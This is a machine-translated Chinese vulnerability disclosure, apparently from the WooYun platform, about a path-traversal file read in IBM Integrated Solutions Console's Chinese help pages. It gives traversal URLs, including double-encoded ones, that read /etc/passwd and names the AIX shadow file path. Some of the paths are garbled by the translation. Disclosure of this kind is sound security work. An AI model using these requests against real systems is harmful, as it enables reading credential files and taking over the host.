漏洞标题 IBM Integrated Solutions Console中文帮助系统任意文件读取漏洞 相关制造商 IBM 漏洞作者 过路人 提交时间 2016-05-10 23: 30 公共时间 2016-06-27 15: 06 漏洞类型 任何文件遍历/下载 危险等级 高 自我评估等级 10 漏洞状态 已提交给第三方合作机构（cncert National Internet Emergency Center） 标签标签 漏洞详细信息 IBM Integrated Solutions Console中文帮助系统具有任何文件读取漏洞。它部署在AIX，Linux，Solaris，Windows和其他系统上。它通常用于AIX系统。它主要是根。它可以直接读取密码文件并获取系统权限。 它在内联网中非常普遍，并且已经在银行，政府，医院和运营商等各种行业中多次被发现。更多部署在5335（http访问）/5336（https访问）端口上，许多管理员都不知道这个系统。 中文帮助系统基本存在，英语不存在！ 漏洞链接：http://ip: port/help/topic/com.ibm.isclite.cp.help /./././././././././。/./././etc/passwd（aix shadow是/etc/security/passwd，一般可以直接读取）和 http://ip: port/help/topic/com.ibm.isclite.cp.help/images ./././././././././././././etc/passwd 要么 http://ip: port/help/topic/com.ibm.isclite.cp.help /.% 252e /.% 252e /.% 252e /.% 252e /.% 252e /.% 252e /.% 252e /.% 252e /.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd 漏洞证明： 公共网络只是寻找一些例子（请告知整改）： **。**。**。** **。**。**。** **。**。**。** 修理计划： 过滤./ 寻找IBM 版权声明：请注明出处。居民A @乌云